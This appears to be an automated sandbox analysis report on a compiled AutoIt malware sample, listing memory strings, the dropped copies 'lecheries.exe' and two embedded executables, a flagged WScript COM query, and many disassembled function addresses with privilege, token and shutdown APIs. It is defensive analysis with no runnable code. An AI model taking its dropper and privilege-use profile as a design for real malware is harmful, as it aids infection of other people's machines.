                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: This is a third-party compiled AutoIt script.0_2_00893B3A
                  Source: 8kDIr4ZdNj.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: 8kDIr4ZdNj.exe, 00000000.00000003.2153111882.0000000003FE3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7c4d6f8c-3
                  Source: 8kDIr4ZdNj.exe, 00000000.00000003.2153111882.0000000003FE3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b61310f9-9
                  Source: 8kDIr4ZdNj.exe, 00000000.00000000.2140384904.0000000000944000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_30111320-0
                  Source: 8kDIr4ZdNj.exe, 00000000.00000000.2140384904.0000000000944000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_00f4931d-9
                  Source: lecheries.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: lecheries.exe, 00000002.00000000.2153651802.0000000000C14000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d3e4d00f-1
                  Source: lecheries.exe, 00000002.00000000.2153651802.0000000000C14000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_a56faf2c-4
                  Source: lecheries.exe, 00000008.00000002.2296672981.0000000000C14000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f6c02f9c-2
                  Source: lecheries.exe, 00000008.00000002.2296672981.0000000000C14000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d805cece-a
                  Source: 8kDIr4ZdNj.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3fe7d695-2
                  Source: 8kDIr4ZdNj.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_464aedc7-0
                  Source: lecheries.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5111c357-f
                  Source: lecheries.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_80e692b9-5
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FA1EF: GetFullPathNameW,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_008FA1EF
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008E8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_008E8310
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008F51BD
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B21C50_2_008B21C5
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008C62D20_2_008C62D2
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_009103DA0_2_009103DA
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008C242E0_2_008C242E
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B25FA0_2_008B25FA
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_0089E6A00_2_0089E6A0
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008A66E10_2_008A66E1
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008EE6160_2_008EE616
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008C878F0_2_008C878F
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008F88890_2_008F8889
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008A88080_2_008A8808
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_009108570_2_00910857
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008C68440_2_008C6844
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008BCB210_2_008BCB21
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008C6DB60_2_008C6DB6
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008A6F9E0_2_008A6F9E
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008A30300_2_008A3030
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B31870_2_008B3187
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008BF1D90_2_008BF1D9
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B14840_2_008B1484
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008A55200_2_008A5520
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B76960_2_008B7696
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008A57600_2_008A5760
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_0089192B0_2_0089192B
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B19780_2_008B1978
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_0089FCE00_2_0089FCE0
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008B1D900_2_008B1D90
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008BBDA60_2_008BBDA6
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00917DDB0_2_00917DDB
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_0089DF000_2_0089DF00
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_015020180_2_01502018
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B730302_2_00B73030
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B831872_2_00B83187
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8F1D92_2_00B8F1D9
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B821C52_2_00B821C5
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B962D22_2_00B962D2
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B814842_2_00B81484
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B9242E2_2_00B9242E
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B825FA2_2_00B825FA
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B755202_2_00B75520
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B876962_2_00B87696
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B9878F2_2_00B9878F
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B757602_2_00B75760
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B788082_2_00B78808
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B968442_2_00B96844
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B6192B2_2_00B6192B
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B819782_2_00B81978
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8CB212_2_00B8CB21
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B96DB62_2_00B96DB6
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B8BDA62_2_00B8BDA6
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B81D902_2_00B81D90
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00BE7DDB2_2_00BE7DDB
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B6FD492_2_00B6FD49
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00B6DF002_2_00B6DF00
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_019825E02_2_019825E0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECFBD505_2_00007FF75ECFBD50
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB53E35_2_00007FF75ECB53E3
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECD6F7C5_2_00007FF75ECD6F7C
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECBCB245_2_00007FF75ECBCB24
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECD2C605_2_00007FF75ECD2C60
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECF4B005_2_00007FF75ECF4B00
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECD65F05_2_00007FF75ECD65F0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED960D45_2_00007FF75ED960D4
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB60805_2_00007FF75ECB6080
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECBA0325_2_00007FF75ECBA032
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECC40305_2_00007FF75ECC4030
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECBA01E5_2_00007FF75ECBA01E
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECBA03E5_2_00007FF75ECBA03E
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED8DDF85_2_00007FF75ED8DDF8
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB9E005_2_00007FF75ECB9E00
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB7D505_2_00007FF75ECB7D50
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB1EED5_2_00007FF75ECB1EED
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED03EA05_2_00007FF75ED03EA0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECEFE905_2_00007FF75ECEFE90
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED2FE605_2_00007FF75ED2FE60
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED2DE205_2_00007FF75ED2DE20
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED7BB905_2_00007FF75ED7BB90
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED2BB205_2_00007FF75ED2BB20
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED31CB05_2_00007FF75ED31CB0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECF7C305_2_00007FF75ECF7C30
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECD3C205_2_00007FF75ECD3C20
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED6F9DC5_2_00007FF75ED6F9DC
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECBB9B05_2_00007FF75ECBB9B0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED8F9645_2_00007FF75ED8F964
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB99205_2_00007FF75ECB9920
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECEDA705_2_00007FF75ECEDA70
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED91A945_2_00007FF75ED91A94
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED7F8045_2_00007FF75ED7F804
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECBD8105_2_00007FF75ECBD810
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECE17805_2_00007FF75ECE1780
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECF58D05_2_00007FF75ECF58D0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED7387C5_2_00007FF75ED7387C
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED858885_2_00007FF75ED85888
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECC58905_2_00007FF75ECC5890
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED315A05_2_00007FF75ED315A0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECD15605_2_00007FF75ECD1560
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECEF5505_2_00007FF75ECEF550
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECD37005_2_00007FF75ECD3700
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECF76A05_2_00007FF75ECF76A0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECC36505_2_00007FF75ECC3650
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECD15605_2_00007FF75ECD1560
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED3D4105_2_00007FF75ED3D410
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB74105_2_00007FF75ECB7410
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB93C05_2_00007FF75ECB93C0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED733845_2_00007FF75ED73384
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECC13305_2_00007FF75ECC1330
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED294805_2_00007FF75ED29480
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECC4A805_2_00007FF75ECC4A80
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED854905_2_00007FF75ED85490
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECF94305_2_00007FF75ECF9430
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB14265_2_00007FF75ECB1426
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED2D4305_2_00007FF75ED2D430
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED851A85_2_00007FF75ED851A8
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB11BB5_2_00007FF75ECB11BB
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB11605_2_00007FF75ECB1160
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECED1505_2_00007FF75ECED150
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED291205_2_00007FF75ED29120
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED032EC5_2_00007FF75ED032EC
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECE53105_2_00007FF75ECE5310
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED2D2D05_2_00007FF75ED2D2D0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECBD2D05_2_00007FF75ECBD2D0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECEF2605_2_00007FF75ECEF260
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECBF2805_2_00007FF75ECBF280
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED2F2305_2_00007FF75ED2F230
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECE70105_2_00007FF75ECE7010
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED26FE05_2_00007FF75ED26FE0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECF6F905_2_00007FF75ECF6F90
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED30F205_2_00007FF75ED30F20
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECDF0605_2_00007FF75ECDF060
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED0B0205_2_00007FF75ED0B020
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED2EE105_2_00007FF75ED2EE10
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECCCDA05_2_00007FF75ECCCDA0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECBED805_2_00007FF75ECBED80
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECEAEF45_2_00007FF75ECEAEF4
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED8AEC85_2_00007FF75ED8AEC8
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED72E805_2_00007FF75ED72E80
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED70E185_2_00007FF75ED70E18
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED08E205_2_00007FF75ED08E20
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED6EB945_2_00007FF75ED6EB94
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED76CA45_2_00007FF75ED76CA4
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECD4C305_2_00007FF75ECD4C30
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED70C305_2_00007FF75ED70C30
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECF6A005_2_00007FF75ECF6A00
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED2A9C05_2_00007FF75ED2A9C0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECDAAF05_2_00007FF75ECDAAF0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED32B105_2_00007FF75ED32B10
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECC0B005_2_00007FF75ECC0B00
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECC4A805_2_00007FF75ECC4A80
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED02A805_2_00007FF75ED02A80
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED70A485_2_00007FF75ED70A48
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED0E7D05_2_00007FF75ED0E7D0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED787485_2_00007FF75ED78748
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED7085C5_2_00007FF75ED7085C
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECD882D5_2_00007FF75ECD882D
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED3A8305_2_00007FF75ED3A830
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED6E5FC5_2_00007FF75ED6E5FC
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECB85D05_2_00007FF75ECB85D0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED265905_2_00007FF75ED26590
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED2E5405_2_00007FF75ED2E540
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECC27005_2_00007FF75ECC2700
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED986785_2_00007FF75ED98678
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECCA6805_2_00007FF75ECCA680
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED706705_2_00007FF75ED70670
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED3E3A05_2_00007FF75ED3E3A0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECC63745_2_00007FF75ECC6374
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED704845_2_00007FF75ED70484
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECDA4405_2_00007FF75ECDA440
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED2E1705_2_00007FF75ED2E170
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED761445_2_00007FF75ED76144
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D6B3286_2_02D6B328
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D6C1906_2_02D6C190
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D661086_2_02D66108
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D6C7516_2_02D6C751
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D6C4706_2_02D6C470
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D64AD96_2_02D64AD9
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D6CA316_2_02D6CA31
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D6BBD26_2_02D6BBD2
